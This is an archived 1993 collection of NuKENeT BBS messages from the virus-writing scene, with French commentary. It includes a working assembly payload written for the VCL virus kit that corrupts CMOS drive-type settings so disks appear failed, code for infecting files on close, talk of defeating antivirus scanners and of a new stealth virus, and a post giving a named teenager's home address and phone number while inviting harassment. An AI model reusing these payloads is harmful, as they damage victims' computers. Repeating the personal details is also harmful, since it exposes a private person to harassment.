4 51h 01h | 2 51h 02h | 3 52h 01h | 1 52h 02h
2 53h 01h | 7 54h 01h | 5 55h 01h | 3 56h 01h
1 56h 02h | 6 57h 01h | 2 58h 01h | 2 58h 02h
9 59h 01h | 2 59h 02h | 6 5Ah 01h | 1 5Ah 02h
7 5Bh 01h | 4 5Ch 01h | 4 5Dh 01h | 4 5Eh 01h
4 5Fh 01h | 4 60h 01h | 2 60h 02h | 5 61h 01h
1 61h 0Bh | 3 62h 01h | 1 62h 02h | 3 63h 01h
1 63h 02h | 1 63h 03h | 1 64h 01h | 2 64h 02h
1 64h 14h | 7 65h 01h | 2 66h 01h | 1 66h 02h
8 67h 01h | 2 67h 05h | 1 67h 08h | 1 67h 23h
1 68h 01h | 3 69h 01h | 1 69h 04h | 2 69h 05h
1 69h 06h | 1 69h 10h | 7 6Ah 01h | 1 6Ah 03h
4 6Bh 01h | 1 6Bh 02h | 2 6Bh 10h | 3 6Ch 01h
2 6Dh 02h | 1 6Dh 05h | 1 6Dh 06h | 1 6Dh 07h
1 6Dh 0Ch | 7 6Eh 01h | 1 6Fh 01h | 1 70h 02h
1 70h 0Bh | 2 70h 10h | 1 70h 20h | 1 71h 01h
4 72h 01h | 1 72h 02h | 1 72h 04h | 7 73h 01h
1 73h 02h | 1 73h 07h | 15 74h 01h | 3 74h 02h
5 74h 03h | 1 74h 07h | 8 75h 01h | 7 75h 02h
2 76h 01h | 2 76h 02h | 3 77h 01h | 3 78h 01h
1 78h 03h | 8 79h 01h | 3 7Ah 01h | 4 7Bh 01h
3 7Bh 05h | 4 7Ch 01h | 2 7Dh 01h | 2 7Eh 01h
1 7Eh 14h | 4 7Fh 01h | 1 7Fh 02h | 4 7Fh 03h
1 7Fh 06h | 30 80h 01h | 3 80h 02h | 2 80h 03h
1 80h 04h | 1 80h 08h | 7 81h 01h | 1 81h 02h
1 81h 06h | 4 82h 01h | 14 83h 01h | 3 83h 02h
1 83h 0Bh | 5 84h 01h | 1 84h 05h | 1 85h 01h
5 86h 01h | 2 87h 01h | 1 87h 02h | 1 87h 03h
1 88h 01h | 1 88h 02h | 1 88h 03h | 3 89h 02h
1 89h 12h | 9 8Ah 01h | 1 8Ah 02h | 1 8Ah 03h
1 8Ah 3Ah | 23 8Bh 01h | 1 8Bh 09h | 4 8Ch 01h
1 8Ch 02h | 6 8Dh 01h | 1 8Dh 02h | 12 8Eh 01h
1 8Eh 02h | 3 8Fh 01h | 2 90h 01h | 1 90h 02h
2 90h 03h | 7 91h 01h | 5 92h 01h | 3 93h 01h
2 94h 01h | 5 95h 01h | 3 96h 01h | 1 96h 02h
2 97h 01h | 1 98h 01h | 1 98h 02h | 3 99h 01h
1 99h 03h | 2 9Ah 01h | 1 9Bh 02h | 3 9Ch 01h
8 9Dh 01h | 2 9Eh 01h | 6 9Fh 01h | 5 A0h 01h
1 A0h 02h | 1 A0h 03h | 8 A1h 01h | 1 A1h 1Ah
2 A2h 01h | 1 A2h 03h | 3 A3h 01h | 1 A3h 0Dh
1 A4h 01h | 1 A4h 02h | 2 A5h 01h | 2 A6h 01h
5 A7h 01h | 1 A7h 03h | 3 A8h 01h | 1 A9h 01h
1 A9h 02h | 8 AAh 01h | 8 ABh 01h | 3 ABh 02h
2 ABh 03h | 3 ABh 04h | 1 ABh 06h | 8 ACh 01h
4 ADh 01h | 2 AEh 01h | 2 AFh 01h | 6 B0h 01h
2 B0h 02h | 5 B1h 01h | 3 B2h 01h | 2 B3h 01h
4 B4h 01h | 1 B4h 07h | 3 B5h 01h | 2 B5h 02h
1 B5h 04h | 3 B6h 01h | 4 B7h 01h | 15 B8h 01h
7 B8h 02h | 1 B8h 03h | 1 B8h 0Dh | 1 B9h 01h
1 B9h 02h | 11 BAh 01h | 1 BAh 04h | 10 BBh 01h
1 BBh 02h | 3 BBh 03h | 7 BCh 01h | 2 BCh 02h
4 BDh 01h | 3 BEh 01h | 6 BEh 03h | 6 BFh 01h
1 BFh 02h | 1 BFh 05h | 3 C0h 01h | 5 C1h 01h
1 C1h 02h | 3 C2h 01h | 2 C2h 02h | 3 C3h 01h
8 C4h 01h | 2 C5h 01h | 5 C6h 01h | 1 C6h 02h
1 C7h 02h | 4 C8h 01h | 4 C9h 01h | 1 C9h 02h
1 CAh 01h | 1 CAh 02h | 4 CBh 01h | 6 CCh 01h
5 CCh 02h | 5 CDh 01h | 8 CDh 02h | 2 CDh 04h
1 CDh 06h | 1 CDh 10h | 1 CDh 14h | 2 CDh 18h
1 CDh 1Eh | 1 CDh 2Eh | 1 CDh 3Eh | 1 CDh 42h
2 CDh 47h | 1 CDh 4Eh | 1 CDh 68h | 1 CDh 71h
1 CDh 97h | 13 CEh 01h | 1 CEh 09h | 2 CFh 01h
2 CFh 02h | 1 CFh 06h | 4 D0h 01h | 1 D0h 09h
2 D1h 01h | 2 D1h 02h | 1 D1h 05h | 6 D2h 01h
1 D2h 05h | 5 D3h 01h | 1 D3h 07h | 1 D4h 01h
5 D6h 01h | 5 D7h 01h | 1 D7h 04h | 9 D8h 01h
1 D8h 03h | 2 D9h 01h | 4 DAh 01h | 9 DBh 01h
4 DCh 01h | 2 DDh 01h | 1 DDh 02h | 1 DEh 01h
1 DFh 01h | 1 DFh 02h | 3 E0h 01h | 1 E0h 02h
1 E0h 06h | 2 E1h 01h | 1 E1h 02h | 2 E2h 01h
2 E2h 02h | 25 E3h 01h | 1 E3h 02h | 2 E4h 01h
2 E4h 02h | 1 E5h 01h | 1 E5h 02h | 2 E6h 01h
1 E6h 02h | 1 E7h 01h | 1 E7h 02h | 6 E8h 01h
1 E8h 15h | 4 E9h 01h | 1 E9h 02h | 1 E9h 05h
1 EAh 01h | 14 EBh 01h | 1 EBh 06h | 2 ECh 01h
1 ECh 03h | 1 ECh 17h | 1 ECh 1Ah | 2 EDh 01h
1 EDh 02h | 4 EEh 01h | 4 EFh 01h | 5 F0h 01h
1 F0h 05h | 1 F1h 02h | 1 F2h 01h | 18 F3h 01h
8 F4h 01h | 8 F5h 01h | 3 F6h 01h | 2 F6h 07h
4 F7h 01h | 2 F8h 01h | 2 F8h 07h | 2 F9h 01h
1 F9h 02h | 4 FAh 01h | 7 FBh 01h | 1 FBh 02h
12 FCh 01h | 3 FCh 02h | 4 FDh 01h | 3 FDh 02h
13 FEh 01h | 1 FEh 03h

/\
< AE >
\/
--- Msged/sq
* Origin: Cyber City (40:2/2)

Msg #: [105/121] Base: Anti-Viral Talk [NuKENeT]
Date : 18 Jan 93 01:37:01 Stat: Sent
From : Aristotle
To : Arthur Ellis
Title: Virus Statistics

If you use that on a STEM and LEAF diagram, then the information you gave
would be beneficial to me for sure!

ARiSToTLE
--- GEcho 1.00/beta+
* Origin: If at first you don't succeed...Dig deeper into the melon!
(40:1/13)

Msg #: [109/121] Base: Anti-Viral Talk [NuKENeT]
Date : 22 Jan 93 00:32:02 Stat: Sent
From : Terminator Z
To : All
Title: OK

OK Hot off the press! New virus!

COM/EXE/BIN/OVL/SYS Parasitic Resident Polymorphic Multipartite Stealth
virus, >>> 2048 bytes <<<! Well this beast sure does spread... get your
hands on it..
DaeMaen virus by TaLoN ! Infects floppy boot sectors/ Hard Disk partition
tables as well as the above. Will infect Hd on boot from infected floppy
OR execution of infected file , including SYS file .. So Well there you
go recipe for instant success. Gonna scare the shit outa the AV world,
but then again they need one every once in a while. ...
Anyway happy times.

TZ
--- FMail 0.92
* Origin: -/- ToTAL MAYHEM - JE NE REGRETTE RiEN -/- (1:950/3)

Msg #: [112/121] Base: Anti-Viral Talk [NuKENeT]
Date : 24 Jan 93 15:05:01 Stat: Sent
From : Digital Justice
To : All
Title: New News!

Well, I got something to say to all you "
VX" people out there, and I
think you'll find this quite interesting, so sit back and open your
ears.
I run the Virus Syndicate BBS here in the DC area. I have been
running this system for about 2 years now. It's nothing huge, but it
serves it's purpose - making viruses and source code available to
those who want/need them. Well, I got a new user the other day...Mr.
Aryeh Goretsky...one of McAfee's cohorts. He created a new account
using his real name and left me feedback requesting access. Since I
have no problem with this, I gave him normal system access. I
decided to voice him first to actually make sure it was indeed him
who called. I spoke with him for a few minutes and it was him who
called. I asked him why he wanted on and he said something about
hearing that it was an "
interesting" system and someone in the 804
area code told him to check it out.
About two days went by and he hadn't called back. I called him and
started asking more questions. I wanted to know his specific purpose
in calling. He admitted to me that he called mainly to check out the
log on screen I have. What I did was capture McAfee's BBS intro
screen, alter it a bit with my own information, and use it as my
opening shell. He told me that two things could be wrong with this.
First, the term "
The Virus Help Forum" trademark of McAfee
Associates. Second, he wanted to check and see if my using it
constituted slander. He captured everything and handed it all over
to their lawyers. I informed Mr. Goretsky that I already checked
with two separate lawyers and they already checked into this matter
for me. I told him that he should have their lawyers better spend
their time and resources fighting another battle that's going on (you
all know what I'm talking about...I hope). I also told him that I've
asked the U.S. Secret Service about my BBS violating any known
federal statutes and also checked into it on a state and
international level. Everyone told me the same thing...that what I
wanted to do was not illegal.
I make live viruses and source code available on my system for almost
anyone who wants them. I do not encourage people to download them,
do not encourage people to UNZIP them, do not encourage people to run
them, give away copies, or spread them in any manner. I just make
them available...that's it. The only thing I ask is that people
contribute something...like an occasional upload. It takes a long
time and, at times, money, to make them available. All my viruses
have ZIP comments telling you what they are. Everything is very
clear here...no gimmicks at all.
Several years back, I was the one looking for viruses. I was a
Junior in college and became genuinely interested in them. I called
McAfee Associates, Symantec, Central Point, and several others asking
how I could get a live virus or two so I could check it out for
myself. Everyone basically told me the same thing...NO! I didn't
know what to do... I was on the FIDO VIRUS forum and noticed a
number for the Virus Exchange in Sofia, Bulgaria. I copied down the
number and called...several times. Running up a huge phone bill, but
was getting what I wanted.
I made myself a promise after the Virus Exchange BBS went down. I
promised myself that I would share my viruses with the rest of the
computing community that wanted/needed them. I didn't want them to
have to go through what I had to with the various anti-virus "
big
shots" like McAfee Associates. I knew that there were others out
there like I was a few years back when I was hunting for viruses and
couldn't get my hands on them.
So, now that I've stated my purpose in running my system, which is in
no way illegal, let me state McAfee Associates purpose in attempting
to shut me down. They need positive publicity - period. They are
in a sticky situation with legal matters at the present time and this
would be a way for them to avert attention away from it. They have
some sort of vendetta against people like myself, Aristotle,
FireCracker, Rock Steady, and others who make or distribute viruses.
This makes McAfee Associates appear to be the "
good guys" and
everyone else "
bad guys".
Aryeh Goretsky's calling me is just another feeble attempt by
McAfee's gang to shut down a BBS using scare tactics. Well, it won't
work here. The name "
McAfee" or Aryeh Goretsky does nothing for me,
except for bring on an occasional bowel movement from time to time.
make their scanners and other products available on my system, but
refuse to use them...and I don't encourage users to use them. Their
product is at best adequate when compared to others.
So, John McAfee, Aryeh Goretsky, and your pack of lawyers...try to
shut me down. As previously stated, I've looked into the legality of
my opening screen and have been repeatedly told that it's not illegal
or slanderous. Why don't you guys print out the previous sentence,
roll it up, and shove it up your ass...because that's where it
belongs. You guys are talking out of your ass...which is nothing
new.
Oh yeah, let me tell you about the guy who started this whole thing.
His name is: MIKE SICA
He lives at: 14310 WEST SALISBURY ROAD
MIDLOTHIAN, VIRGINIA
His phone #: (804) 794-0533
I have more personal information, but choose not to release it at
this time. The above information is publically accessible.
Mike runs a BBS called Airwaves. It's a public domain system and
really a piece of shit if you ask me. He runs WildCat (yep...lame
bastard paid for it) BBS software and only has two nodes. The
message areas suck and I've been told that someone, for several
years, has been uploading infected software onto his system. He uses
McAfee's VSHIELD (which is not registered) and SCAN (also not
registered) to "
protect" his software. Apparently someone created
several dozen "
dummy" accounts and his file areas are literally
crawling with infected shareware/freeware files.
Mike Sica is usually up all night long because he has nothing better
to do with his life than "
nerd-out" on his system. He's about 18
years old, has black hair, is about 5 foot 10, skinny and walks with
a limp. He's basically one of the biggest loosers I've ever talked
to and met. He attends a private school in Henrico County...close to
where I used to live. His dad is a Doctor at the Medical College of
Virginia. At times, Mike Sica works for his father, who by the way
is a Urologist, tending to the patients urine specimens. What a
living... Eighteen years old and has to suck on his daddy's dick for
a job! Just what I wanted to do when I was his age...NOT!
Feel free to use Mike Sica's information as you wish. I will not
encourage you to call and harass him. I will not also encourage you
to send farm animals or discontinue certain services to his parents
house. Or, if you just wanna tell him what a fucking asshole he is,
I will not try to stop you. Do what you want...many others have and
continue to do so.
Anyways, live long and prosper. Fuck McAfee and Fuck the Police! As
long as it's not illegal...keep on doing it!!

Digital Justice
Virus Syndicate SysOp

Oh yeah...here's my BBS intro screen:

--------------------------- Cut Here ------------------------------

You have reached (703)222-0033 Zoom v.32bis 14.4 Fax/Modem
Please make sure your line settings are: 8 data, no parity, 1 stop
+---------------------------------------------------------------+
: WELCOME TO McAfee ASSociates' HOMEBASE BBS... ------+ :
: _ /! : The Virus Help Forum : :
: \,o.O' : Running 1 Z00M Fax/Modem VFX v.32bis : :
: =(___)= : 14,400bps, v.32bis, v.42bis, MNP 2-5 : :
: U +---------------------------------------------------+ :
+---------------------------------------------------------------+
Choices: VIRUS, APPLY, CHECK, FEEDBACK, CHAT, GOODBYE

--------------------------- Cut Here ------------------------------

--- GEcho 1.00/beta+
* Origin: If at first you don't succeed...Dig deeper into the melon!
(40:1/13)


-------

Hehehe... Int‚ressant... De quoi faire jaser les m‚mŠres du
911... Cette guerre (Psycho-guerre) entre McAfee Cie & Dark
Justice me semble assez partag‚e...Je penche quand mˆme du c“t‚ de Dark
Justice... disons pour son annonce de Bbs... Mais si l'on en
croit le texte d‚crit, et si on prend mot pour mot sa
description des faits (Qui ne dit pas s'il travaille
underground avec son board), Le tort va … McAfee, ou Mike
Sica... (???). De toutes fa‡ons, qu'il se d‚merde... Y a l'air
assez grand pour ‡a...

Ceci dit, comme vous le voyez, c'est probablement le propre du NuKENet de
scanner les messages … chaque node et de ne laisser passer que les plus
hots sur le net, car, … part le "
small talk" ‚pisodique, histoire de
d‚tendre un peu l'atmosphŠre, on parle business, ici, et c'est s‚rieux.

Toutes les sections du net sont aussi... int‚ressantes. La section [ASM
programming], par exemple...



-------


Msg #: [248/365] Base: ASM Programming [NuKENeT]
Date : 10 Jan 93 04:04:31 Stat: Sent
From : Arthur Ellis
To : All
Title: Heuristics

There has been some discussion of heuristic techniques lately. I had
occasion to code something of this sort recently, in order to deal with
a crypt which had a periodicity of 16 (i.e. there was an observable
repetition each 16 bytes). The program simply tries different "
confusion
vectors" on the crypt and collects scores to determine how it is doing.
I'm working on the optimization now. Results look like this:

[C:\OUT\TEST]testent4 f2

994 bytes
Buffer: 4D 26 33 14 52 3E 48 6B 4F 0A 6E 0A 72 62 25 08 score
6.876523
Buffer: 63 26 7E 65 65 0C 67 4A 02 4A 68 17 52 56 41 67 score
6.804016
Buffer: 31 55 4B 46 71 36 57 6D 1F 6B 60 2D 73 6C 3A 15 score
6.787298
Buffer: 35 5A 36 3D 72 74 2F 60 7D 2E 1F 30 4A 56 68 32 score
6.729538
Buffer: 22 10 41 4F 01 63 14 1E 61 1B 59 41 15 13 10 52 score
6.612251
Buffer: 54 54 0B 1D 4F 47 40 47 1B 5A 7A 15 74 52 7D 16 score
6.577854
/* Crypt cracker by Arthur Ellis */

extern double entro(char *, int); // returns entropy of buffer
char *randomize(void);
void
main(int argc, char **argv)
{
/* Declarations and initializations go here */
srand(time(0));
while (!kbhit()) {
for (i = 0; i < bytes; i++) {
if (buf1[i] != '\n')
buf2[i] = buf1[i]; // buf2 is the work buffer
}
buf3 = randomize();
for (i = 0; i < bytes; i++) {
buf2[i] ^= buf3[i % 16]; // apply confusion vector
// every 16 bytes
}
score = entro(buf2, bytes);
if (score < lowscore) {
lowscore = score;
printf("
Buffer: ");
for (i = 0; i < 16; i++)
printf("
%02X ", buf3[i]);
printf("
\tscore %f\n", (float) score);
}
}
fcloseall();
}
char *
randomize(void)
{
int i;
char *buf;
buf = malloc(16);
for (i = 0; i < 16; i++) {
buf[i] = rand() % 127;
}
return (buf);
}

--- Msged/sq
* Origin: Cyber City (40:2/2)


Msg #: [261/365] Base: ASM Programming [NuKENeT]
Date : Wed 13 Jan 1993 8:46p Stat: Sent Local
From : Rock Steady
To : Tormentor
Title: Re: debugging session?
Reply: This message is a reply to #260

*** Quoting Tormentor to Rock Steady ***

To> Hi Rock.
To> You told me before that you liked dive deep into debugging
To> sessions with Scan etc...
To> Whatabout making a report of the 'new scanning engine' that Scan
To> and Fprot uses?
To> Would be very useful, especially when it comes to polymorphic
To> code.
To> Maybe even extract the algorithm used for catching MtE?
To> I mean, if you look to the TPE, there he has put quite much work
To> in 'senseless instructions' and 'dumb jumps' but technically the

Humm, nice idea, I was working with that as a matter of fact, I was
working thru F-prot resently to by-pass some features, and why some of my
features didn't work, All it all I think I can provide some info, I hate
to do it all myself, I'm really not `too' happy, we got hundreds of Av
products. From a Stand point of view, my session with F-prot have been
challeging, its good, REAL good, VIRSTOP is not however, compared to
VSHIELD. Vshield will be a tough cookie, I dunno what I saw last time, by
quite comfusing, maybe its the C++ overhead? But its good, and then Scan,
the easiest of the all. However this will take sometime, I would want to
form an `team' of debuggers. I can't speak for myself, my lack of
knowledge on `Cryption' Sucks, This will throw me far out, but because of
my own Cracking background, bypassing any traps won't be a problem, I can
handle my self there, and come up with a `AntiStealth' routine to defeat
it.
But I'm not Good enough. I'm okay, but can't handle all this by my own,
I was willing to SET this as a goal for Info Journal #5 or #6, but its
demanding, I have been working with Screaming radish resently of F-prot,
we talk about some nice routines it had. But we need a few more other
guys. A Small team, never the less a good team. I can contact you guys,
I don't mind the call charges, (NOT), I don't wish to push anyone, But
frankly Tormentor I've seen some of your works, and your groups, quite
something, don't be a stranger here. Fuck the moral group expectations,
We shouldn't compete, as we have the same target in mind, self-knowledge
and show the `AVers' that there 100% effective Scanners suck!
Terminator-Z, lots of `steams' comes between us, what do you say? We could
use a a cool programmer?
Tormentor, So whats next? I'll jump into it if you come along...or else
its gotta wait and take a while, lets hit them with a BIG bang!

Rocky

Msg #: [267/365] Base: ASM Programming [NuKENeT]
Date : 12 Jan 93 22:57:00 Stat: Sent
From : Ken
To : Soltan Griss
Title: Disenfect on the fly

* In A Message To Ken, Soltan Griss Said:

SG> well thats what i have working right now, the only pproblem i seem
SG> to have is infecting the file on the close.. how would i get the
SG> file name from the handle. I have a PD program that i can add, but
SG> it's hugh. and i want a simpler way of doing it..

Here is how I do it. You need to get the system file table (SFT) for the
handle number.

push bx ; Save file handle
mov ax,1220h ; DOS get JFT entry
int 2fh ; Call DOS
; ES:[DI] contains the SFT
; entry for the file handle

mov ax,1216h ; DOS get SFT entry pointer
mov bx,byte ptr [di] ; Put SFT entry number in BX
int 2fh ; Call DOS
; ES:DI holds SFT pointer
; for the file
ES:DI now points to the SFT.

There are also lots of other goodies in this table. Here is the structure
for the SFT (from UNDOCUMENTED DOS)

For DOS 3.1+
------------

00h DWORD Pointer to next file table
04h WORD Number of files in this table
06h 35 bytes per file

00h WORD Number of file handles referring to this file
02h WORD File open mode (Int 21h/AH=3Dh) bit 15 set if
opened via FCB
04h BYTE File attribute
05h WORD Device info word
07h DWORD Pointer to device driver header if char. device
else pointer to DOS drive parameter block
0Bh WORD Starting cluster of file
0Dh WORD File time in packed format (Int 21h/AX=5700h)
0Fh WORD File date in packed format (Int 21h/AX=5700h)
11h DWORD File size
15h DWORD Current offset in file
19h WORD Relative cluster within file of last accessed
* 1Bh WORD Absolute cluster number of last accessed
0000h if never read or written to
* 1Dh WORD Number of sector containing directory entry
1Fh BYTE Number of directory entry within sector
--> 20h 8 BYTES Filename (No extension, padded with spaces)
--> 28h 3 BYTES File Extension
2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing
same file
2Fh WORD (SHARE.EXE) network machine number which opned
file
31h WORD PSP segment of file's owner
33h WORD Offset within SHARE.EXE code segment of sharing
record
* For DOS 4.x
-----------

1Bh DWORD Number of sector containing directory entry
1Dh 3 BYTES Unknown (Network redirector)
35h WORD (local) absolute cluster number of last
accessed
37h DWORD Pointer to IFS driver for file, 00000000h if
native DOS

So, in both cases, the file extension will start at DI+39.

-Ken
--- GEcho 1.00/beta+
* Origin: 2181EBE700727B8CC1F913CBB44ACD21 - (40:1/1)


Msg #: [274/365] Base: ASM Programming [NuKENeT]
Date : 17 Jan 93 19:29:27 Stat: Sent
From : Arthur Ellis
To : All
Title: CHKINT.COM

Here is the interrupt checker. It can be useful for finding unusual
interrupt routines.

N CHKINT.COM
E 0100 E9 99 01 0D 0A 43 48 4B 49 4E 54 20 28 43 29 20
E 0110 62 79 20 50 61 64 67 65 74 74 2C 20 31 39 38 39
E 0120 0A 0D 20 45 78 74 72 61 63 74 73 20 49 6E 74 65
E 0130 72 72 75 70 74 20 53 65 71 75 65 6E 63 65 73 20
E 0140 28 43 44 20 78 78 29 20 66 6F 75 6E 64 20 69 6E
E 0150 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65
E 0160 73 0A 0D 20 49 6E 76 6F 63 61 74 69 6F 6E 3A 20
E 0170 43 48 4B 49 4E 54 20 3C 66 69 6C 65 6E 61 6D 65
E 0180 3E 1A 24 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0280 00 00 00 00 24 00 00 00 00 00 00 00 20 20 20 00
E 0290 00 68 20 20 20 20 00 00 68 0D 0A 24 B4 62 CD 21
E 02A0 8E C3 BE 80 00 26 8A 0C 80 F9 00 75 09 BA 63 01
E 02B0 B4 09 CD 21 CD 20 46 8B 16 83 02 32 FF 8A D9 03
E 02C0 DE 26 89 17 46 89 36 85 02 B4 3D B0 00 8C DA 89
E 02D0 16 89 02 8C C2 8E DA 8B 16 85 02 CD 21 73 25 BA
E 02E0 EE 02 B4 09 CD 21 8B 16 85 02 CD 21 CD 20 20 43
E 02F0 6F 75 6C 64 20 6E 6F 74 20 6F 70 65 6E 20 46 69
E 0300 6C 65 20 24 A3 87 02 B4 09 8B 16 85 02 CD 21 BA
E 0310 1D 03 CD 21 8B 16 89 02 8E DA EB 3A 90 0D 0A 20
E 0320 50 6F 73 73 69 62 6C 65 20 49 6E 74 65 72 72 75
E 0330 70 74 73 20 46 6F 75 6E 64 20 0D 0A 20 20 20 4E
E 0340 6F 2E 20 20 20 54 69 6D 65 73 20 4F 63 63 75 72
E 0350 72 65 64 0D 0A 24 B4 3F B9 00 02 8B 1E 87 02 BA
E 0360 15 04 CD 21 73 22 BA 6F 03 B4 09 CD 21 CD 20 20
E 0370 42 61 64 20 66 69 6C 65 20 72 65 61 64 20 72 65
E 0380 70 6F 72 74 65 64 20 24 3D 00 00 7F 33 B4 3E CD
E 0390 21 BF 00 00 BB 00 00 8A 9D 83 01 83 FB 00 74 15
E 03A0 E8 51 00 A3 96 02 8B DF E8 49 00 A3 8F 02 BA 8C
E 03B0 02 B4 09 CD 21 47 81 FF FF 00 75 DB CD 20 CD 20
E 03C0 BE 15 04 8B C8 83 F9 00 74 8C 8A 04 46 49 80 3E
E 03D0 8B 02 00 7F 0B 3C CD 75 EC C6 06 8B 02 01 EB E5
E 03E0 32 E4 88 26 8B 02 8B F8 8A 9D 83 01 FE C3 88 9D
E 03F0 83 01 EB D1 33 C0 8A E3 80 E4 0F 80 C4 30 80 FC
E 0400 39 7E 03 80 C4 07 B1 04 8A C3 D2 E8 04 30 3C 39
E 0410 7E 02 04 07 C3 00 00 00 00 00 00 00 00 00 00 00
E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0610 00 00 00 00 00
RCX
0515
W
Q

--- Msged/sq
* Origin: Cyber City (40:2/2)


Msg #: [311/365] Base: ASM Programming [NuKENeT]
Date : 23 Jan 93 23:34:00 Stat: Sent
From : Screaming Radish
To : Rock Steady
Title: VCL routine

Hello Rock!
I promised you a routine to modify the drive types in cmos, so having a
hour to spare tonight I figured I may as well keep that promise. The
follow routine has been tested with the VCL 1.0 and as far as I can tell
works fine.
What this one does is change the cmos drive type for any defined drives
and recalculates the cmos checksum so there is no telltale cmos failure
message.
The net effect is the bios will either report a hard drive failure just
like it would with a dead drive or display a "
no operating system"
message. No data is actually lost on the drive unless the user is a fool
and reformats, if they are that stupid the deserve to lose data ;-)

Screaming

=======================================================================

cld
push ds ; save ds
xor ax,ax ; zero ax
mov ds,ax ; ds = 0000h
mov si,046ch ; ticks since midnight
lodsw ; get lsw
mov bx,ax ; save it in bx
lodsw ; get msw
or bx,ax ; combine it with lsw
xor bl,bh ; combine into a byte
pop ds ; restore ds
mov dx,70h ; dx = register latch
address
mov al,2eh ; msb of checksum
out dx,al ; latch register address
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov ch,al ; msb to ch
dec dx ; dx = register latch
address
mov al,2fh ; lsb of checksum
out dx,al ; latch register address
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov cl,al ; lsb to cl
dec dx ; dx = register latch
address
mov al,12h ; hard drive type register
; bits 7-4 = first drive
; bits 3-0 = second drive
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
in al,dx ; read register
mov bh,al ; save drive types
sub cx,ax ; subtract from checksum
and al,0fh ; mask for second drive
jnz cmos_1 ; jmp if 2 hard drives
and bl,0f0h ; mask out 2nd drive
modifi
cmos_1: xor bl,bh ; modify drive types
xor bh,bh ; zero bh for checksum add
add cx,bx ; update checksum
dec dx ; dx = register latch
address
mov al,12h ; drive type register
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,bl ; new drive types
out dx,al ; write register
dec dx ; dx = register latch
address
mov al,2eh ; msb of checksum
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,ch ; msb of new checksum
out dx,al ; write register
dec dx ; dx = register latch
address
mov al,2fh ; lsb of checksum
out dx,al ; set register
jmp $+2 ; short delay
inc dx ; dx = register r/w io
address
mov al,cl ; lsb of new checksum
out dx,al ; write register
=======================================================================
--- GoldED 2.40
* Origin: The House of the Screaming Radish [NuKE] (111:950/75)


-------

On pourrait passer des heures … s'abreuver … ces sources de savoir que
sont les mecs de NukE, non?

Allez, encore deux messages, tir‚s des autres sections. Le premier parce
qu'il est rigolo, et le deuxiŠme parce qu'il s,agit d'un in‚dit de Bruce
Sterling! Y‚!

-------


Msg #: [172/196] Base: Phreaking Away [NuKENeT]
Date : Thu 21 Jan 1993 9:51a Stat: Sent Local
From : Ned239
To : Public Enemy
Title: Re: Hmm...
Reply: This message is a reply to #169 and has 1 reply

Don't know about Canada, but it is legal to listen on cordless
conversations in the U.S. The recent trouble Prince Charles was in stemmed
